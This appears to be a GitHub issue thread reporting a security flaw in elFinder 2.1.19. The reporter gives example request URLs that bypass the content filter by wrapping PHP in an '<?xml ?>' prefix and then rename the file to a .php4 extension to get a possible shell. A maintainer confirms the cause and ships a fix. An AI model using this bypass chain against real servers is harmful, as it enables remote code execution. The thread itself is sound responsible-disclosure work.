### ISSUE TITLE
Possible mime/content bypass in rename function?

### ISSUE THREAD

**Issue by AlvFolgado** [Studio-42/elFinder#1891]
Hello elfinder community,

I would like to report some issues that I think that could be critical for security reasons:

http://URL/elfinder.php?cmd=put&target=l1_c2ltcGxlLnR4dA==&content=<?xml%20?><?php%20phpinfo();%20?>

==> Content filter fail to bypass with <?xml ?>

http://URL/elfinder.php?cmd=rename&target=l1_c2ltcGxlLnR4dA==&name=simple.php4

==> Software default blacklist fail to check .php4/.php5 extensions. This extensions works by default in a lot of apache default configurations.

1. Upload .txt
2. Put php payload with <?xml ?><?php ?>
3. Rename to .php4
4. Load file, shell?

Tested on elfinder 2.1.19

I have set my configurations to have:

		'uploadAllow'     => array(),
		// mimetypes not allowed to upload
		'uploadDeny'      => array('all'),
		// order to proccess uploadAllow and uploadDeny options
		'uploadOrder'     => array('deny', 'allow'),

Sorry if its a kown issue,

Alvaro Folgado

**Comment by nao-pon** [comment]
@AlvFolgado The cause of this problem is that it is not checked when the MIME type is unknown. I will fix it as soon as possible.

Thank you for your report. 👍

**Comment by nao-pon** [comment]
I done. @AlvFolgado Please check on [nightly-build](https://github.com/Studio-42/elFinder/archive/2.1.zip).
